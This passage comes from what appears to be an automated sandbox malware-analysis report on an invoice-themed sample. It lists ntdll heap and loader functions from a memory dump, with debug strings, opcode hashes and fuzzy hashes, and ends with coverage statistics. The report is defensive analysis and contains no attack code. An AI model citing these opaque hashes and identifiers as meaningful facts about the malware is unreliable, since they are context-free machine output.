                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 6791342bd6d8f279b028994545aa43fe1a9a4c2fe8064cf2635cba6233971499
                                                  • Instruction ID: ee8ba6a8607b02db30b82577c6a283bef9f8b5a9c2447f52f0d5d7a6d7f86136
                                                  • Opcode Fuzzy Hash: 6791342bd6d8f279b028994545aa43fe1a9a4c2fe8064cf2635cba6233971499
                                                  • Instruction Fuzzy Hash: 07E1D574A04341CFF711CF25C888B6AB7E9BF88358F954A2DE9958F281D771E844CB92
                                                  Function 367AFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: 5b8e4e5f9a90d9817ee289adb9538d1ed6a0b90a606bd41fe8d799e2ef492d39
                                                  • Instruction ID: 6b9dce811a617123fd3a6f987df08b6c76a33b18829a35e9dc24a886c6c368d4
                                                  • Opcode Fuzzy Hash: 5b8e4e5f9a90d9817ee289adb9538d1ed6a0b90a606bd41fe8d799e2ef492d39
                                                  • Instruction Fuzzy Hash: DF416EB5E00309ABDB01CF99C894AEEBBB6FF49754F904269ED04AB340D7359902CB90
                                                  Function 367DF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: a79a8a45da9fb8f5e0edf6d2a4c52cb39d2f925dd7c464fb58517b5b4bf9bea7
                                                  • Instruction ID: 31caa195fa3fb1e1b6517e9cb04253cfcce0cb3293208a3e94d0b1b9698bbc3f
                                                  • Opcode Fuzzy Hash: a79a8a45da9fb8f5e0edf6d2a4c52cb39d2f925dd7c464fb58517b5b4bf9bea7
                                                  • Instruction Fuzzy Hash: 17711270900644DFDB01CF68C8646ADFBF2FF89714F84845AE584AF291CB399942CF60
                                                  Function 36726565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36789843
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36789885
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36789854, 36789895
                                                  • LdrpLoadShimEngine, xrefs: 3678984A, 3678988B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: 735701c221fa536663648769c4a13a03d109d04e1e684e133f2755f1b8e62f8c
                                                  • Instruction ID: dbc707f63f200e1e60f819118c1412f61c422187220bf857ad0f30f77bc77a32
                                                  • Opcode Fuzzy Hash: 735701c221fa536663648769c4a13a03d109d04e1e684e133f2755f1b8e62f8c
                                                  • Instruction Fuzzy Hash: 84516531A103549FDB10DBA8CC98BAC7BB3FB48704F94416AE650BF296DB749C92C781
                                                  Function 3675DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 5283a6e3011c44f3e742a856d9c3ac16307b3928247a00480b57755ba22f9a84
                                                  • Instruction ID: 9be0fde5fb6f870a5b579f2d567dde0b015c61443fed3ae499bcda5958d71623
                                                  • Opcode Fuzzy Hash: 5283a6e3011c44f3e742a856d9c3ac16307b3928247a00480b57755ba22f9a84
                                                  • Instruction Fuzzy Hash: 2E412774A14700DFE701CF24C948BAAB7F6EF40754F9085A9E6055F291CB3C9982CFA5
                                                  Function 367DECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • HEAP: , xrefs: 367DECDD
                                                  • Entry Heap Size , xrefs: 367DEDED
                                                  • ---------------------------------------, xrefs: 367DEDF9
                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 367DEDE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                  • API String ID: 3446177414-1102453626
                                                  • Opcode ID: 1698e727641508140f4ce37a9cc6283c6f88bb41c9224bcbe04485f66703a75c
                                                  • Instruction ID: 5e2c97d4d1a46430e18e2760d65a1a1b57248a8ad06315f930b965ed81af5d81
                                                  • Opcode Fuzzy Hash: 1698e727641508140f4ce37a9cc6283c6f88bb41c9224bcbe04485f66703a75c
                                                  • Instruction Fuzzy Hash: 0B41A139A20219DFD706CF15C484A197BB7FF897547A5C9A9D514AF310DB31EC82CBA0
                                                  Function 3675DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: 8e71731fc4904c3a261a3a077cc45ecd7f6d328864813786b1c883309c15ce6e
                                                  • Instruction ID: a473301ffbd50780c14c6b8fb244a484233e2d4f2a01ccfd56241d986f6292c0
                                                  • Opcode Fuzzy Hash: 8e71731fc4904c3a261a3a077cc45ecd7f6d328864813786b1c883309c15ce6e
                                                  • Instruction Fuzzy Hash: 84314475520784EFE712DB24C80CB9937EAEB00A58F8084C5E6415F652CB6ED981CA62
                                                  Function 36739046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@
                                                  • API String ID: 3446177414-1194432280
                                                  • Opcode ID: 15b4a591d6950e52b31d8e809c552280239f9dae165e666cad9ea564c44f628e
                                                  • Instruction ID: b8f39af709c839c88b1f663c69631e95185b0b1a309c8ad593cece160f20fbd5
                                                  • Opcode Fuzzy Hash: 15b4a591d6950e52b31d8e809c552280239f9dae165e666cad9ea564c44f628e
                                                  • Instruction Fuzzy Hash: 22818072D112699BDB21CF54CC45BEEB7B8AF08700F5041DAEA19BB250E7309E85CFA5
                                                  Function 36764C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 367A3466
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 367A3439
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 367A344A, 367A3476
                                                  • LdrpFindDllActivationContext, xrefs: 367A3440, 367A346C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: c3cf8111d2e2b8e3baf712141668459643b053656a2ac2cf1345d2f419b1883e
                                                  • Instruction ID: a212c324b593959ee4c970a661de74c2339e0bdf0b932190b83399c9cc2d9286
                                                  • Opcode Fuzzy Hash: c3cf8111d2e2b8e3baf712141668459643b053656a2ac2cf1345d2f419b1883e
                                                  • Instruction Fuzzy Hash: 9C3116A6D00311AFFB119B07C844A3572A6BB447ACFC2C366DD026F349E7609C88C6F1
                                                  Function 3672F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 222d037324587a3c5815230b2d8af021db7e4fac5554b95461c90c5e5bd5bf25
                                                  • Instruction ID: 1fec672181ecf4cceee7be1ba3605ca7863003d375de456ec1429e4105fa06bf
                                                  • Opcode Fuzzy Hash: 222d037324587a3c5815230b2d8af021db7e4fac5554b95461c90c5e5bd5bf25
                                                  • Instruction Fuzzy Hash: 12912371794750AFE305CF25CC48B2AB7A6AF84B44FD04559EA849F281DB38E852CB93
                                                  Function 36750AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36799F2E
                                                  • Failed to allocated memory for shimmed module list, xrefs: 36799F1C
                                                  • LdrpCheckModule, xrefs: 36799F24
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: e561d9e4def38362dba2ae6d7029c669ff29a3b6518650c9d8d8a72a8a75f3f9
                                                  • Instruction ID: c2ad7c98698904b56bab0c78c13be1f8ef8ca0050f5c30213ccea8c163727bf8
                                                  • Opcode Fuzzy Hash: e561d9e4def38362dba2ae6d7029c669ff29a3b6518650c9d8d8a72a8a75f3f9
                                                  • Instruction Fuzzy Hash: 3471D575E00205DFEB04DF68CC94BBEB7F2EB48608F9584ADEA05AF251E7349942CB51
                                                  Function 3675EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c72e67c23480677e5d1daf697f5ae3e080b1566c93db4cdd1eada9c6afaaba8
                                                  • Instruction ID: 3263402f3f3a3197b50f9e1b651757efc3fb5b1f00c64693408983e21f2321f2
                                                  • Opcode Fuzzy Hash: 8c72e67c23480677e5d1daf697f5ae3e080b1566c93db4cdd1eada9c6afaaba8
                                                  • Instruction Fuzzy Hash: 86E127B4D10718CFEB21CFA9D984A9DBBF2FF48304F61456AE655AB260D734A842CF50
                                                  Function 3680A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 29e3af05ffde5790f1fa727c604c4018abab9c9d98d3ae498bf226f67b716fe2
                                                  • Instruction ID: d2c02ff407d2c10cbee3d7d9f925f36ed3d1a29dd12a51d5b75377d7092c665c
                                                  • Opcode Fuzzy Hash: 29e3af05ffde5790f1fa727c604c4018abab9c9d98d3ae498bf226f67b716fe2
                                                  • Instruction Fuzzy Hash: 54517D75B14626EFEB08CE19CC91A9D73E1BB8D354B10486DDA06D7712DBB1AC45CF80
                                                  Function 367AEBC0 Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: b240f1971ffbe5efdaf16d7a2c891b289b6ae8a6a2b792a59eb032e1aad69745
                                                  • Instruction ID: ef58192c2f8e2ed1c8963df4a94631405a33fee3dd0183c0b87d6111e1454680
                                                  • Opcode Fuzzy Hash: b240f1971ffbe5efdaf16d7a2c891b289b6ae8a6a2b792a59eb032e1aad69745
                                                  • Instruction Fuzzy Hash: 215125B2E103189FEF04CF9AD844ADDBBB6BF48354F94822AE905AB350D7359941CF50
                                                  Function 36767A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                  • String ID:
                                                  • API String ID: 4281723722-0
                                                  • Opcode ID: 1f6f09382f1ab42b2c7e0f6c94eeb84665d78d03a269fd1b8bbcc9519a02df17
                                                  • Instruction ID: f75e0032ea085adc6f2ba0dbef5cf1106eb1a940a931534d3f1c1c9e39742d7e
                                                  • Opcode Fuzzy Hash: 1f6f09382f1ab42b2c7e0f6c94eeb84665d78d03a269fd1b8bbcc9519a02df17
                                                  • Instruction Fuzzy Hash: 42312875E00218DFDF05DFA9D848A9DBBF1AB4C720F50812AEA11BB390D7355901CFA1
                                                  Function 367358E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: b20828674d286b3fea30a7c790fd27657ac282c5fb145361589e0abcbfff9a34
                                                  • Instruction ID: e193a806d9d4865256387f5532ce046f06792b4896fc5e381ce9757448c823b1
                                                  • Opcode Fuzzy Hash: b20828674d286b3fea30a7c790fd27657ac282c5fb145361589e0abcbfff9a34
                                                  • Instruction Fuzzy Hash: E2324B74D11369DFEB22CF64C848BE9BBB1BF08344FA081E9D549AB242D7745A84CF91
                                                  Function 367D8B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: ${}6
                                                  • API String ID: 0-6358032
                                                  • Opcode ID: 86968a2e47189f5913f97a688a77bf2d1da061104e635ac07abd3d31cf81a978
                                                  • Instruction ID: 9dc3cb4ec9343e97b925650a07391e2c79257dfc6c82f446b40007a3ae263efa
                                                  • Opcode Fuzzy Hash: 86968a2e47189f5913f97a688a77bf2d1da061104e635ac07abd3d31cf81a978
                                                  • Instruction Fuzzy Hash: FDB14D71A093019FD710CF29C884A6BB7E5EF84754F944E6EF9A49B2A0D730D944CF92
                                                  Function 36764B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: bc1b82a65e79c15f965dc8c1687b280c06535592495347d991e1b3a7167aa683
                                                  • Instruction ID: 7b2e111eff0a2bab70506919aac530f003a7043d96de5c13b61a4f72ea1a1896
                                                  • Opcode Fuzzy Hash: bc1b82a65e79c15f965dc8c1687b280c06535592495347d991e1b3a7167aa683
                                                  • Instruction Fuzzy Hash: B2519CB5E10704CBEB10CF96C884769FBF6EF44758FA4C22AD84A9F244E7709985CB90
                                                  Function 3672E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ^r6
                                                  • API String ID: 3446177414-2011571528
                                                  • Opcode ID: 6db886b4f34fd60ffa4ca4a4efb44e897c579ce84b551c216e37726dcb25acf3
                                                  • Instruction ID: cc78eb44c48a919e4d7b332c8d6d0648a314dad7e59dbafde54c604978cc2391
                                                  • Opcode Fuzzy Hash: 6db886b4f34fd60ffa4ca4a4efb44e897c579ce84b551c216e37726dcb25acf3
                                                  • Instruction Fuzzy Hash: 3041A2B9A20211DFD705CF1AC4846657BF6FF58714BA0806AED08CF360D730E891CBA0
                                                  Function 3672DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: 938fdb0cf9d328f53067c5ea5d577fd6b00a736ef731358fd6dd25dcb631378e
                                                  • Instruction ID: 78cbc0e0617bd6aee035d16b03ed250b0acdb363f65ea2257df8af4fd5568b16
                                                  • Opcode Fuzzy Hash: 938fdb0cf9d328f53067c5ea5d577fd6b00a736ef731358fd6dd25dcb631378e
                                                  • Instruction Fuzzy Hash: 694159B1A187419FD300CF29C444A5BBBE5BB8C358F544A2EF598DB200D771EA05CF96
                                                  Function 3672E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: r6$mr6
                                                  • API String ID: 3446177414-3552528108
                                                  • Opcode ID: cdf4abb7b3833821000cac7db97b89ab943713f421934e46348b7cb070041e24
                                                  • Instruction ID: de10c95b0965139fc629fe67034e45ff95b1e5a0d5ee0c02d90e82fd0d73a0fd
                                                  • Opcode Fuzzy Hash: cdf4abb7b3833821000cac7db97b89ab943713f421934e46348b7cb070041e24
                                                  • Instruction Fuzzy Hash: BB11C6B5A01218AFDF11CF98D885ADEBBB9FF4C360F10411AF911B7240D735A954CB61

                                                  Execution Graph

                                                  Execution Coverage:2.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:39
                                                  Total number of Limit Nodes:3
